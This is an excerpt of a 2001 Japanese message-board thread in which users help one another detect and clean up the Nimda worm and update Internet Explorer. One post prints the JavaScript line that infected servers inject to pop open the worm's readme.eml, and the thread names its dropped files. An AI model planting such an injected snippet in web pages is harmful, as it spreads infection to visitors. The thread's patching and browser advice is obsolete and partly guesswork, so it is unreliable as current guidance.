めちゃくちゃ古くないか?・・・鬱だ。
359 :01/09/19 16:36 ID:zeh.yX7c
360 :01/09/19 16:36 ID:gsbkGkZw
361339:01/09/19 16:37 ID:BwXoFOdw
>>340
そうですね、サイトがビジーのようでダウンロード中断されちゃいました。

>>347
ありがとうございます。
Javaは切ってるから大丈夫なんですけどちょっと気になったものですから、、、
この騒動が落ち着いた頃にマターリダウンロードすることにします。
362nanasisan:01/09/19 16:38 ID:KSWVQD0E
>>360
ちゃんとMicrosoftからダウンロードしましょう。

# つーか、感染してるサイトっぽいな・・
# こっちからだとコネクションが確立できないので未確認だが。
363    :01/09/19 16:38 ID:t5ePDc5w
>>357
どこに出来ているんですか?
364名無しさん:01/09/19 16:39 ID:eSUd69Ts
>344
俺も。
どうするよ。
365初心者:01/09/19 16:39 ID:3dIdB1mI
IE5.01SP2とIE5.5SP2って何が違うんですか?
366nanasisan:01/09/19 16:39 ID:KSWVQD0E
>>363
"Temporary Internet Files" の中だと思う。
感染サイトにアクセスすると例外なく作られてしまうが、実行しなければ感染しない。
367 :01/09/19 16:39 ID:EXieD9aY
結局感染しても再セットアップすればいいのですか?
368  :01/09/19 16:39 ID:3L/GxfkM
よく分からない初心者は今すぐPCの電源切って寝てて下さい。
369名無し:01/09/19 16:39 ID:t5ePDc5w
*.eml じゃなくて*.logのファイルがたくさんでているんだけど。これ
確実にウイルスだよね?
370 :01/09/19 16:40 ID:b.qLQcx6
ウィルスに感染していた場合
パソコン初期化すれば元に戻りますか?
371 :01/09/19 16:40 ID:5KhGe4rU
>>358
漏れのは3.1.0Fだが、何か?
372    :01/09/19 16:41 ID:9X9vIrlE
今、ダウンロード中。
ADSLにしといて良かったと、初めて思った。
373  :01/09/19 16:41 ID:6741/eko
つい最近IE4.0から5.5に変えたが、心配かな?
雑誌のCDからインストルしたんだが。
374ふぁあ:01/09/19 16:42 ID:1SmjZecc
w32.nimda.a@mm[1].htm
こんなファイルあったからちょっとビックリした。
単なるシマンテックのキャッシュか。
375 :01/09/19 16:42 ID:f7NLWTrQ
http://windowsupdate.microsoft.com/
ここがさっきと違うんですけど
なんで
376nanasisan:01/09/19 16:42 ID:KSWVQD0E
>>370
感染してしまったら素直にフォーマットして再インストールするのが間違いないでしょう。
あと、少し待てば駆除ツールがどこかで公開されるかもしれないので、急がない人は
そういう方法でも大丈夫でしょう。

ただし、必要なファイルをバックアップする場合は、そのファイルが感染していないか
どうかを必ず確認しましょう。
377夜勤前に寝るからラスト:01/09/19 16:43 ID:AmEHqk4c
状況報告ver1.05(前編)
感染前対策
1.IE5.01とIE5.5はSP2以外無条件でDL実行してしまうので、感染前ならアップデートする
2.それでもダイアログは開くので、覚えのないファイルはDLしない。
3.ツール→インターネットオプション→セキュリティ→レベルのカスタマイズ
 →java関連とダウンロードのファイルのダウンロードを不許可。

現在わかっている影響
1.メールによるウイルスファイルの頒布
2.WEBコンテンツ閲覧時にそのサーバにウイルスパケットを送り攻撃、感染する。
3.バックドアを開き、クライアントを丸裸にする。
4.大量の*.emlファイルを量産する。
5.感染したPCはCドライブをネットワーク共有する。
6.システムのスローダウン
7.リソースの消耗
8.他のファイルに潜伏する。

メールによる接触時
ウィルス感染したメールを受信したとき、readme.exe はwav(音声)ファイルになりすます。

LANによる感染
 社内に一人でも対策してないひとがいてノーパスとかにしていた場合
 LANの共有フォルダを使っても自己増殖する。

感染鯖
 ソースの最後に<html><script language="JavaScript">window.open("readme.eml", null,
"resizable=no,top=6000,left=6000")</script></html>
が追加される。
378 ◆UFOeLm3c :01/09/19 16:43 ID:vqKxOqfA
極初心者なのは仕様が無いとしても、
過去レスくらい読みましょうよ.マジで. ネ(困.

漏れは産毛の生えかけた初心者だけど、
500レスまでくらいならキチリと読めるモンな(苦.
379続き:01/09/19 16:44 ID:AmEHqk4c
状況報告ver1.05(後編)
感染の有無の確認
1.●トレンドマイクロ オンラインスキャン
http://www.trendmicro.co.jp/hcall/scan.htm

2.『*.eml』『readme.exe』『MEP51B3.TMP.EXE』の検索でHIT
 *.emlが大量にHITした際は確定。
 ただし、それが以前に自分の書いた見覚えのあるメールだったら、
それはウイルスではない。
 そうでないときは後者2個を削除して様子を見る。
 といっても後者二つを消したからウイルスが消えるわけではない。
 ファイルのDLを拒否してもファイルが作成されたという報告
(多分一時ファイルに残っているだけだろうが)があるので、
危険ブラウザでない人もファイルのDLを不許可にした方がいい。
3.『mep』で検索した際に『mep????.tmp』がHITする(らしい)


感染時の対応
 感染してしまった後は、アップデートしても無意味。
 とりあえず感染を拡大しないようにウイルス対応ソフトのHP以外には行かず、ワクチンが出来るまで他のWEBコンテンツを回らない。

 感染前に対応ブラウザにして、DL拒否しているのにスキャンで
感染しているというときは多分『インターネット一時ファイル』
に残っているので、気になるならツール→インターネットオプション→
全般→インターネット一時ファイル→ファイルの削除

 ワクチンできたよとかの情報など、追加のフォローさらに宜しく!>ALL
380 :01/09/19 16:45 ID:f7NLWTrQ
>>342
どこでやったの?
381fgん:01/09/19 16:46 ID:1SmjZecc
>>342
ダウンロードする為のプログラムっぽいな。
382 :01/09/19 16:47 ID:j1VFphlo
今ie5.5なんだけどie6.0にアップデートするときって
一度ie5.5はアンインストールせねばならんの?
383z61-115-88-213.dialup.wakwak.ne.jp:01/09/19 16:47 ID:vAVHUk8c
ひまー 
384^^。:01/09/19 16:48 ID:YqOIBj/g
>>375 今回のウィルス対策のjava設定するとWINDOWS UPDATEがみれないね。
385 :01/09/19 16:48 ID:b.qLQcx6
>376
レスありがとうございます
386名無しさん:01/09/19 16:48 ID:t5ePDc5w
>>382
そんなことないよ。
387nanasisan:01/09/19 16:49 ID:KSWVQD0E
>>382
そのままインストールできます。
388マシリト総理 ◆84VbUMtQ :01/09/19 16:49 ID:eKw5kRXU
>>342
ie5setup.exeならただの起動ファイルだと思う
実行したらインストールしてあるコンポーネントに応じて
必要なファイルをダウンロードしてくるはず
389  :01/09/19 16:50 ID:r3BBNxwQ
http://headlines.yahoo.co.jp/hl?a=20010919-00000002-vgb-sci
のリストの中の一つに良く言ってたんだが感染してないようだ。

ってアリ?
390 :01/09/19 16:54 ID:f7NLWTrQ
IE5.5sp2一時間以上かかるんですが、これでいいの
391nanasisan:01/09/19 16:56 ID:KSWVQD0E
>>390
皆ダウンロードを始めているので遅いです。
392375:01/09/19 16:56 ID:f7NLWTrQ
>>384
そうでした。かなしー超初心者です・・・
393 :01/09/19 16:57 ID:TTQxvtB6
>>390
1時間くらいかかると思います
394 :01/09/19 16:58 ID:GBTxzJMs
検索してみたら、『readme.exe』だけが見つかったんだけど、
これって感染してるんでしょうか?
今のところ、感染の症状らしきものは何もないんですが。
395 :01/09/19 16:58 ID:f7NLWTrQ
30分ぐらいになってました。表示では一時間以上だったんだけど
396 :01/09/19 16:59 ID:f7NLWTrQ
こっちに書き込んでるとやっぱダウンロードも遅くなるんでしょうか
397お昼:01/09/19 16:59 ID:k3oIsIQw
午後12時くらいは、もっとスカスカだったのにな
こんなになるとは
398 :01/09/19 16:59 ID:.cHQDFeM
「これって感染してるの?」と聞く前に
冷静に過去ログを読みなさい。
399名無し:01/09/19 16:59 ID:zfuBxYlQ
俺も「IE5.5SP2」ダウンロードしようと思ったんだけど、やっぱり
メチャ時間掛かるんだね、途中でやめちゃったよ。
電話代もったいなくても更新すべきか?
400かりん:01/09/19 16:59 ID:wtGoMrqY
ここを読んで、早速IE5.0をダウンロードしました。
でも不安になってさらにIE6.0にバージョンアップしたんだけど、
すっごい時間がかかっちゃた・・・。
今更ながらですけど、IE6.0のメディアってかっこいいですね!
401  :01/09/19 17:00 ID:6741/eko
>>396
そんなに変わりはない・・はず。
回線によるかモナー
402nanasisan:01/09/19 17:00 ID:KSWVQD0E
>>394
"Temporary Internet Files" にあるだけで、そこの中でクリックして
実行していなければ問題ないはず。でも念のためウイルススキャンはしておくように。
http://news.2ch.net/test/read.cgi?bbs=news&key=1000867662&st=377&to=379&nofirst=true
403:01/09/19 17:03 ID:zfuBxYlQ
自分のブラウザのバージョンを知るには何処を見ればいいの?
404 :01/09/19 17:03 ID:tMWklW4A
>>387-388
ありがとう
405しょしょしんしゃ:01/09/19 17:03 ID:k3oIsIQw
今、発売中のパソコン雑誌の付録の
IE5.5いれても、ダメですよ。
マイクロソフトまで、取りに行きましょう。
406ヽ(´ー`)ノ :01/09/19 17:03 ID:M04LoXGc
>>243 さん
IP4 SP2のユーザーです。私もこんなことでバージョンを更新したくないと
思っていたところでしたので、ご教示助かりました。さっそくscriptを無効
にして、ちょっと安心しています。

2ちゃんねるのニュース速報版もニューヨーカーみたいに、危機に際しては
親切な人が出てくるんですね。感謝です。
407  :01/09/19 17:03 ID:6741/eko
>>403
「ヘルプ」→「バージョン情報」
408 :01/09/19 17:04 ID:uoDPka6U
ヘルプの所のバージョン情報>>403
409 :01/09/19 17:04 ID:uoDPka6U
かぶっちゃったヽ( ´ー`)ノ
410  :01/09/19 17:05 ID:6Fem1rMY
>>358
>McAfee VirusScan Schedular 4.0.3a
少し古いけど、これは、エンジン部分のバージョンだから、
むしろ、定義ファイルのバージョン(日付)の方が重要です。
411 :01/09/19 17:05 ID:GBTxzJMs
>402
どうもありがとうございます。
ウイルススキャンやってみます。
412 :01/09/19 17:06 ID:ltlOjxgU
でもJavaオフにするとMSのサイトとか見れねえんだよな。
クソめんどくせえ。
413 :01/09/19 17:06 ID:mMROBpHE
>>299
おれはDatula使ってる。Beckyより安い2980円。
複数アカウントも使いやすい。
http://www.onsystems.co.jp/
414 :01/09/19 17:06 ID:6741/eko
関係無いのだが、ブラウザうpデートしたらMXの調子がおかしくなった。
415  :01/09/19 17:09 ID:dzMHUcWY
ここもwhile(1){} か・・・
鬱だ、氏のう・・・
416  :01/09/19 17:08 ID:AXdw0Hxk
国連関連のWEBにウィルスがあったので通報したらすぐにサーバーを止めたとの
返事が帰ってきた。世界は俺の手で救われた。( ̄ー ̄)ニヤリ
417 :01/09/19 17:11 ID:AOaX/eHc
2ちゃんねる自体から感染することはある?あと感染してたら2ch見るの控えた方がいいんだろうか
418名無し募集中。。。  :01/09/19 17:11 ID:xCFKqck6
http://www.zdnet.co.jp/news/0108/16/b_0815_02.html?1108011011
Microsoftの「Internet Explorer(IE)5.5」にサービスパック2(SP2)を
インストー ルした場合と,IE 6のベータ版を使用した場合に,
QuickTimeムービーが再生できな いという問題が発生している。
原因はプラグインにあるものと見られている。

これって解決してるの?
419「´Д´д`」@ビッグボディチーム:01/09/19 17:11 ID:J0FhYHSg
なんとなくIEの上位バージョンをダウソしてみた。
みんな同じことやってるみたいだな・・・LANなのに異様に重い・・・
420 :01/09/19 17:13 ID:LPyMVUd2
http://www.trendmicro.co.jp/hcall/scan.htm

これってどうやって使うの?
421  :01/09/19 17:16 ID:t5ePDc5w
IE6にしました。
そしたら、2chの移動された板が文字化けします。
文字化けする人はこちらって所に行くと最初の画面は見れるんですが
過去ログが文字化けで見れません。
どうしよう・・・。
422nanasisan:01/09/19 17:16 ID:KSWVQD0E
>>418
http://www.apple.co.jp/quicktime/download/index.html
からダウンロードすると良いのでは。
423名無し募集中。。。  :01/09/19 17:16 ID:BS1IhpDc
IE5.5 SP2 まだ?(・ε・)
http://yasai.2ch.net/test/read.cgi?bbs=win&key=994745381


IE5.5 SP2バグ多くて不安定らしい
しかしIE6.0は今だ正式版ではないし・・・
こまったね
424 :01/09/19 17:17 ID:R19Fmukc
◆コード・レッド上回る感染力の新ウイルス、FBIが警告

米連邦捜査局(FBI)は18日、極めて感染力が強い新種のコンピュ
ーター・ウイルス「W32NIMDA」が広まりつつあるとして注意
を呼び掛けた。7月にインターネットの情報の流れを滞らせ、ホワイト
ハウスのサーバーを攻撃した「コード・レッド」よりも広範囲に被害
をもたらす可能性があるという。
ウイルスは「Admin(政府)2(to)3W(War)」、つまり「第三次
世界大戦へ向かう政府」という意味のことばを逆に書いたような名称。
このため、先週の同時テロとの関係を指摘する声もあるが、アシュク
ロフト司法長官は記者会見で、「ウイルス感染と同時テロとを結びつ
ける証拠は現時点では得ていない」と述べた。
ウイルスは昨日から電子メールの添付ファイルとともに急速に広がり
出し、サーバーやパソコンへの感染は数万件に達している模様だ。
「README.EXE」の名前が付いた電子メールのファイルを開いて感染
した例が報告されている。(ワシントン=安藤淳)
425nanasisan:01/09/19 17:18 ID:KSWVQD0E
>>420
そのまま「ウイルスバスター On-Line Scan」をクリックすると良い。
あとはウイルスチェック用のActiveXコントロールがダウンロードされるので、
それを受け入れればOK。ただし要IE(しかもActiveXをONにしなければならない)

>>423
IE6は正式版になりました。
http://www.microsoft.com/japan/ie/
426 :01/09/19 17:19 ID:oaR/VUnY
>>413
ありがと。
BeckyにしろDatulaにしろmboxに変換しちゃえば何とか過去メールの
移行はできそうですね。

悩ましい。
427 :01/09/19 17:18 ID:mJYJCLtQ
>>418
Apple USのサイトにQT用のActiveX Controlがうぷされてるよ
428 :01/09/19 17:19 ID:mMROBpHE
IEやめてNetscape4.78にしる〜
429 :01/09/19 17:19 ID:mJYJCLtQ
>>418
Apple USのサイトにQT用のActiveX Controlがうぷされてるよ
430nanasisan:01/09/19 17:21 ID:KSWVQD0E
>>428
せめてmozillaかnetscape6にしてくれ・・・
431莇さん:01/09/19 17:21 ID:R7qYfRPo
>>423
家6.0既に出てると思われ
432名無しさん:01/09/19 17:22 ID:t5ePDc5w
おいおい!石原慎太郎を訴えたキティ市民団体のニュースを調べたら、
こんなの見つけたよ・・・

【速報】文部科学省地震調査研究推進本部のホームページにも新種ウイルス「Nimda(ニムダ)」が感染
http://www.jiji.com/cgi-bin/contents.cgi?content=2001091910818&genre=soc
433マホメット:01/09/19 17:22 ID:9N7NeOAQ
IE6にうpデートしたら2chが文字化けして見れないよ〜
誰かなおす方法教えて〜〜〜〜〜!
434 :01/09/19 17:22 ID:TTQxvtB6
IE5.5SP2をダウンロードしたら、デスクトップに
インターネットに接続っていうアイコンが新しくできたよ
これ削除してもいいよね?
435 :01/09/19 17:23 ID:oaR/VUnY
>>417
過去ログにもあるが、2ちゃんねるはMSのサーバ使ってない(apache)らしいから、
2ちゃん自体から感染することはないです。
もちろん張ってあるURL安易につついたら、話はべつだけど。
436 :01/09/19 17:23 ID:BS1IhpDc
でたよ Ie6! 〜バージョン3〜
http://yasai.2ch.net/test/read.cgi?bbs=win&key=1000671972

こっちもあまし評判芳しくないね
437nanasisan:01/09/19 17:23 ID:KSWVQD0E
IEを起動するとインターネット接続ウイザードが表示されるので、
それを進めていけば自動的に消えるはず。
438 :01/09/19 17:24 ID:mMROBpHE
今晩あたり中村正三郎が
http://www.asahi-net.or.jp/~ki4s-nkmr/index.html
に「今だにIE使ってる馬鹿がいるんですね。当然の報いですね。自業自得ですね」
と書いてくれることだろう。
439名無しさん:01/09/19 17:24 ID:sLg3ofKQ
密かな疑問なんですけど・・・
暗号強度128-BITって具体的にどこを強化しているの?
440 :01/09/19 17:25 ID:LPyMVUd2
勝手にお気に入りのとこに、MSNがはいってるねんけど
なんで?
441nanasisan:01/09/19 17:25 ID:KSWVQD0E
>>439
httpsで始まるWebサイトを見たときに、128ビットの暗号鍵が使えるようになる。
442まる:01/09/19 17:25 ID:L3v/intc
>>437
それは>434へのお答え?
私も消えないんだけど・・・IEを起動してもそんなウィザード出ないよぉ。
443readmeで:01/09/19 17:25 ID:ZQRPD4GE
検索したら9/19作成でreadme[1] 種類Outlook Expressメールメッセージ、
があって、開くとアウトルックが起動してダウンロードするか聞いてくる・・・。

例のやつ? 削除すればいい?
444:01/09/19 17:26 ID:IkFnIuAs
>>438
ってことは、こいつの仕業か?
445 :01/09/19 17:26 ID:oaR/VUnY
>>439
SSLで情報送信するときでしょう。
他になにかあったかな?
446   :01/09/19 17:26 ID:w2RvISP6
あのさ、ダウンロードがめんどくさかったら、しばらく一時的にでも
ネスケ使えば?雑誌とかについてる付録ですぐインストールできるし。
447 :01/09/19 17:27 ID:mMROBpHE
>>430
だってnetscape6は不安定過ぎ。今のところは4.78が賢明と思う。
netscapeだって6に自信ないから4.75→4.78のヴァージョンアップしたんでしょ?
448nanasisan:01/09/19 17:27 ID:KSWVQD0E
>>442
済まぬポインタ指定してなかった・・
アイコンについては特に必要性はないので消してOKです。
449 :01/09/19 17:28 ID:t5ePDc5w
IE6にして、2ch文字化け・コピペも出来ない。
誰か助けてください〜!
450名無しさん439:01/09/19 17:28 ID:sLg3ofKQ
>>441-445
レスありがとです〜
とりあえずこれで安心なんでしょうかね?
これから自己防衛だけでも勉強してみます。
451 :01/09/19 17:28 ID:4YsZA8ZQ
IE6のクッキーの設定はどうすればいいのか?
452nanasisan:01/09/19 17:29 ID:KSWVQD0E
>>447
それならmozillaで良いのでは。0.9.3くらいからいなり安定して動くよ。
netscapeみたいに謎のソフトウエアも入らないし(藁
453 :01/09/19 17:29 ID:FOUOJ5Cg
今ニュースで言ってたけど、農水省も感染だって
454 :01/09/19 17:29 ID:Ims7haog
>ウイルスは「Admin(政府)2(to)3W(War)」、つまり「第三次
>世界大戦へ向かう政府」という意味のことばを逆に書いたような名称。

これ、日経の記事だろ。日経の記者、頭わるー。
455nanasisan:01/09/19 17:30 ID:KSWVQD0E
>>451
「プライバシー」のタブにある。
456メーラ:01/09/19 17:30 ID:FiG8OYGE
メーラはAL-mailがいいと思うんだが
本筋には全く関係ない
457 :01/09/19 17:31 ID:hqqGjeEU
今アクセスしたら18通もメール来ててびっくりしたよ。
ほとんどワームだった(鬱)
458 :01/09/19 17:33 ID:/LsUGfPI
ネスケ6.1になってチョトまともになった。
459 :01/09/19 17:34 ID:KU2LWOU6
ねえ……
これって冗談抜きで、サイバーテロの始まりじゃないの?
どんどんすごいのがでてきたりして……。
460 :01/09/19 17:37 ID:LPyMVUd2
近畿掲示板見ようとしたら、「新しいファイルをダウンロードしてくれ」
って出てんけど、どうゆう事???
461  :01/09/19 17:38 ID:w2RvISP6
>460
やられたね。
462スーパー初心者ですが:01/09/19 17:39 ID:GycrK3Aw
>14
>の2:Cドライブがネットワーク共有を勝手にされていたら感染している

共有されているかはどうやって確認するんですか?
ガイシュツだったらごめんなさい。
463 :01/09/19 17:40 ID:LPyMVUd2
>>461
マジですか・・・・?
464 :01/09/19 17:40 ID:6ajOW/yo
サーカムのときもそうだったが、今回も感染メールこないねえ。
まあ、プロバイダのウイルスチェックが働いている証拠なんだろうけど。
465 :01/09/19 17:40 ID:jRZmvYDw
ネスケの4.75→4.78のアップデートは必要なんでしょうか?
466netscape4.78はここ:01/09/19 17:41 ID:mMROBpHE

http://home.netscape.com/download/sd_cc32d478ja.html
の一番下の
Download without SmartDownload の所にある
click hereをクリックするのだ。
とりあえず2ちゃんねるは見られるようになるだろう。
467 :01/09/19 17:42 ID:tfoaN1Ng
SP2をダウンロードできないよ〜
再開してもブチブチ切られるコンチクショウ。
468nanasisan:01/09/19 17:42 ID:KSWVQD0E
>>462
エクスプローラを開いてC:ドライブを選び、右ボタンから「プロパティ」。
ただし、Windows NT/2000の場合はOS標準の振る舞いで"C$"という名称で
共有がかかっているが、これについては問題はないので注意。
また、Windows NT/2000の場合はAdministratorsグループに所属しているとか
管理権限が必要なので注意。
469 :01/09/19 17:44 ID:mMROBpHE
>>452
ありがとう
試してみるよ
470ななし:01/09/19 17:44 ID:twveTs.w
IE5.5 SP2が欲しいって奴は近所の電気屋とかに走って
DIONの販促用のCD-ROMもらってこい
あれに入ってるぞ
471 :01/09/19 17:45 ID:LPyMVUd2
>>460です。
ほんとにヤバイんでしょうか?
472 :01/09/19 17:45 ID:oaR/VUnY
>>456
ありがと。
結局使いこんでるメーラーが一番使いやすいってことかな?

確かに本筋から外れてるので、あとは自分でいろいろ調べてみます。
473 :01/09/19 17:47 ID:e.vWKlVo


\ ウイルスに警戒せよ   /
  \ ウイルスに警戒せよ/
  ΛΛ  ΛΛ  .ΛΛ
  (,,゚Д゚) (,,゚Д゚) (,,゚Д゚)
  (| |:|) (| |:|) (,| l:|)
  .|__|:|  |__|:|,   |__|:|
   |__|_|.  |__|_|   |__|_|
   ∪U   U∪   UU
474 :01/09/19 17:48 ID:b8GdSDcM
>>460 = >>471
どこのことを言ってるのかもわからないし、
どういう状況なのかもわからない。
これじゃ何も言いようがない。
475ななし:01/09/19 17:51 ID:qY7BIX9w
ファイル検索したらreadme.exeファイルがあったんですけど、更新日時が
97年だったんですか、これって感染してるんですか?
476252:01/09/19 17:53 ID:bcBbDb0k
252で、PS2へのバージョンアップについて皆さんに教えていただいた者です。
その後、このスレで教えてくださっているウィルスに感染してないかどうかの
チェックもしました。(本当は順番逆ですか?すみません。混んでいて?入れず
やっと終わりました)感染はしていませんでした。安心しました。
しつこいようですが、個別の質問に答えてくださった方、まとめを何度も書いてくださった方、
親切な皆さん、本当にありがとうございました。
引き続き冷静にこのスレで勉強させていただきます。
他の初心者の皆さんも落ち着いて頑張ってくださいね。
477nanasisan:01/09/19 17:53 ID:KSWVQD0E
>>475
身に覚えのないファイルなら削除しましょう。
削除して再チェック。
478肉屋 N50cc-17p144.ppp11.odn.ad.jp:01/09/19 17:57 ID:qUJtOmkU
ああーー!
IE6インストールしたら、何かエラーらしくて、ネット使えなくなったよ。
メールと、カチューシャで2chはできるけど、他ができん!
ちくしょう。
479sancho:01/09/19 18:00 ID:/5tEtTVU
情けない質問ですみません。
IEをアップデートしたら「д」等の記号が太線で表示されるようになってしまったんですが
どこで直せるんでしょうか?
480ななし:01/09/19 18:00 ID:qY7BIX9w
>>477
ありがとうございます。
トレンドマイクロのオンラインチェックで感染ファイルがなければOKなんですよね?
481:01/09/19 18:01 ID:u8nXgCCU
Autoプロテクトにもしてるし、スキャンも問題無かったのに、
私だけ開けないサイトがいくつかあるようです(例えば郵政省のHP)
これは私が感染してるんでしょうか?ウィルス定義の更新もちゃんとしてます。
ただまだIE5.5のSP1ですけど。他板でリンク張ったらみんな軽く開いた・・・。
482スーパー初心者462:01/09/19 18:01 ID:GycrK3Aw
>468
レスありがとうございます。
見たら空き容量が何十バイトかとクリーンアップボタンがあるんですが、
これなら大丈夫なんですよね?
というか、共有されていたらどう表示されるんですか?
483nanasisan:01/09/19 18:01 ID:KSWVQD0E
>>478
詳しいエラー内容を書いてくだされ・・
484 :01/09/19 18:02 ID:mMROBpHE
485:01/09/19 18:04 ID:VjQMha0A
皆さんやさしいですね・・・
茶化す人もいないし・・
2ちゃんねらー見直した。
486nanasisan:01/09/19 18:04 ID:KSWVQD0E
>>480
ほぼ問題ないと考えて良いでしょう。が、これからも注意は怠らないようにしましょう。

>>482
共有されていたらドライブのアイコンに「手で持ち上げているようなアイコン」が表示されるはず。
Windows NT/2000だとデフォルトの振る舞い(>>468)があるので、それとは区別しましょう。
それ以外の場合はそのアイコンがあればさっさと解除しましょう。

また、そもそもプロパティ内に「共有」がなければ特に問題はありません。
念のためウイルスチェックは忘れずに。
4871:01/09/19 18:04 ID:b8GdSDcM
>>481
http://www.yusei.go.jp/ ならScriptも使ってないし、普通に見れるが。
488 :01/09/19 18:05 ID:vsUFHtfk
簡単だからこれ使ってるけど、とりあえずの対策としては大丈夫?
詳しい人教えてください。
http://www.python.f2s.com/brain/tool/tool1.html
4891:01/09/19 18:06 ID:b8GdSDcM
>>485
普段煽ったり荒らしたりしてるのは経験の少ない人間と思われ。
誰かがどっかのスレで書いてたけど、
経験と態度の大きさは反比例するって。
490 :01/09/19 18:06 ID:4YsZA8ZQ
IE6入れたけど、今のところ問題ないようだ。
491名無しさん:01/09/19 18:07 ID:Y0FK2RD.
>>489
それは思いっきり人によると思われる。
アアスレチガイ
492489:01/09/19 18:07 ID:b8GdSDcM
>>489
名前間違えた。逝ってくる。
493nanasisan:01/09/19 18:08 ID:KSWVQD0E
>>488
恐らく大丈夫。とはいえ誰も保証してくれないので注意。
494肉屋 N50cc-17p144.ppp11.odn.ad.jp:01/09/19 18:08 ID:qUJtOmkU
>>483
あ、これはお気遣いありがとうございます。
でもそれも判らないんですよね。
最近全体的に不安定だったんで、
OSごと入れなおすいい機会だと思ってます。
お心遣いは感激しました。どうもです。
495ななし:01/09/19 18:09 ID:qY7BIX9w
>>486
ありがとうございます。
幸いオンラインチェックでは問題ありませんでした。

ところでもし感染してる場合、今度のウイルスでは
メーラーを開いたとたんにアドレス帖にはいってるあて先に
ウイルスメールを勝手に送りつけるのでしょうか?
496 :01/09/19 18:09 ID:t5ePDc5w
>>490
2chの他の板、文字化けしない?
コピペはできる?
漏れのは、できないんだよ・・・
497名無しさん:01/09/19 18:09 ID:Y0FK2RD.
日テレでやってるよ
498今、帰宅。ビクーリ!:01/09/19 18:10 ID:iK.BW4jo
今、IE5,5SP2 にして、ノートン先生の定義を最新にしましたが、
OE起動して、ワームが一杯来てたら、どうすれば?
削除すればいいのかな…?
(怖くてまだOE立ち上げてない)
499481:01/09/19 18:13 ID:u8nXgCCU
>>487
レスありがとうございます。「開いています」と出ますが開けません。他に原因があるようなので、他板
できいてきます。
500名無しさん:01/09/19 18:13 ID:AYshM8WQ
で、もとからIE5.1sp2 IE5.5sp2 IE6の人は安全なのね?
501 :01/09/19 18:18 ID:/LsUGfPI
>>500
サイト見たら即感染→あぼーんが避けられるだけ。
ダウンロードしますか?とかいう画面が出る。(出たらキャンセルだぞ)
不安ならJacascript切っとけ。
502482:01/09/19 18:19 ID:uA1sjTpY
nanasisanさん(さんつけたら変?)、いろいろありがとうございます。
とりあえず大丈夫そうなのですが
ノートンでスキャンしたらメモリ不足でフリーズ。
再起動になりましたが問題ないようでした。
YBBの共有の話題にもびびりまくりでしたが少し安心しました。
503501:01/09/19 18:19 ID:/LsUGfPI
×Jacascript→○Javascript  鬱だ氏のう・・・
504超若葉:01/09/19 18:23 ID:Fgn4LW2.
あのう、今回のウイルスはMacにはなんら被害を
及ぼさないんでしょうか?
ガイシュツだったらごめんなさい。
505479(;´д`):01/09/19 18:25 ID:/5tEtTVU
過去ログ読んできたんですが似たような書き込みが無くわかりませんでした…。
どなたか教えてください…。
506名無しさん:01/09/19 18:25 ID:Y0FK2RD.
>>504
うん
507 :01/09/19 18:26 ID:SrdCnHVQ
どうしたサンスポ
http://sanspo.com/
508 :01/09/19 18:28 ID:t5ePDc5w
IE6で、どうやったら文字化けせずに2chを見れますか
「スレッド一覧」が文字化けしてしまうので、下がっているスレがみれません。
誰か助けてくださーい・・・
509 :01/09/19 18:29 ID:V/j2hVSc
JOKE_BUTTONSていうウィルスが見つかったんですけどどうすればいいですか?
510 :01/09/19 18:29 ID:O6P1VIIo
ダメだ・・・
5.5SP2入れようとしてもタスクスケジューラの署名のとこで
いつも回線切られちまうよ。
ここクリアできた人はどうやったか教えて欲しいっす。
511 :01/09/19 18:31 ID:/Po0AYgw
おいテレビニュースみたぞ。何だか変なウィルスが広まっているらしいな。
サイバーテロだとか。
危険すぎるぞおい。
512504:01/09/19 18:32 ID:zD/ryl9A
>>506
ありがとう。
513 :01/09/19 18:32 ID:JgAOGVbo
>>508 おれなんか過去ログみようとすると、
ファイルのダウンロードウインドウが出るんだけど。
514 :01/09/19 18:32 ID:n6tEsqf2
検索で「名前」、「含まれる文字列」、「探す場所」とかどうゆう設定にすればいいのですか?
「名前」は僕の名前ですか?
「含まれる文字列」というところに.『*.eml』『readme.exe』『MEP51B3.TMP.EXE』
を入力すればいいですか?『』←これもいりますか?
「探す場所」はどこですか?
515  :01/09/19 18:33 ID:Z3m0RcSg
今バージョンアップしたんですけど
更新情報「;SP2;」になてたらOKなんですよね。
516 :01/09/19 18:34 ID:186vJgXg
>>508
とりあえず、こっちいってみれば?わからんが
http://teri.2ch.net/test/read.cgi?bbs=accuse&key=1000645308
517_:01/09/19 18:34 ID:I9BxOHX.
IEアップデートできない…。全然DLできない…。泣きそう。
セキュリティのjavascript関係全部無効にする、だけで
なんとかしのげるでしょうか?
メーラもoutlook expressは使うのやめたほうがいいですか?
518_:01/09/19 18:35 ID:BHKeU2R.
>510
今5.5なの?
タスクスケジューラー停止してインストするとか。
519  :01/09/19 18:35 ID:qWuPgyw6
ダメな奴はネスケ使え。
520 :01/09/19 18:36 ID:t5ePDc5w
>>516
ありがとう!どうにかなりそう!!
521( ゚д゚)ゴルァ!:01/09/19 18:37 ID:2Btp1QlY
みんな環境にやさしいWebBoy for DOSを使え( ゚д゚) ドスドスエ!
http://www-6.ibm.com/jp/pspjinfo/webboy/
522 :01/09/19 18:39 ID:O6P1VIIo
>>518
5.5SP1です。
タスクスケジューラ停止してます。
過去ログ読んだら同じとこでつまづいてる人いますね・・・
523 :01/09/19 18:40 ID:vbCAjpuo
ネットにつないだ瞬間、!!オメデトウ!!どうのこうのと
画面いっぱいに英語で、でてしまうのだが・・・なんでしょう?
524loadme.exeが消せません:01/09/19 18:41 ID:guZYrqdU
>前回のインストールが完了してません
>IEのセットアップを実行する前にコンピューターを再起動して、
>そのインストールを終了してください。
>セットアップは終了します。

と表示され、SP2もIE6もインストールに移る事すらできません
何度再起動しても同じです。
どういうわけでしょうでしょう?
誰か対処法がわかる人いましたらよろしくでし。
525_:01/09/19 18:42 ID:BHKeU2R.
>523
おめでとう。あなたが100万人目の感染者です。
526load.exe:01/09/19 18:42 ID:guZYrqdU
loadme.exeでなくload.exeだった┐(´〜`;)┌
527 :01/09/19 18:44 ID:bi15wNtM
MSNサイトってそもそもJavascript ONにしないと何にも見えないじゃん。
528名無し:01/09/19 18:44 ID:47ZPRi3E
Ver6.0じゃダメなのか?不安だ。
529  :01/09/19 18:46 ID:qWuPgyw6
あのさー、ネタでも何でもなく、素直にネスケ使えばいいじゃん。
不具合でたり、時間かかったり、面倒なだけだよ。
どうせみんな雑誌の付録CD−ROMの1枚ぐらい持ってるでしょ。
5分もあればインストールできるんだから。
何時間もあくせくするよりなんぼかましだよ。
530 :01/09/19 18:46 ID:/LsUGfPI
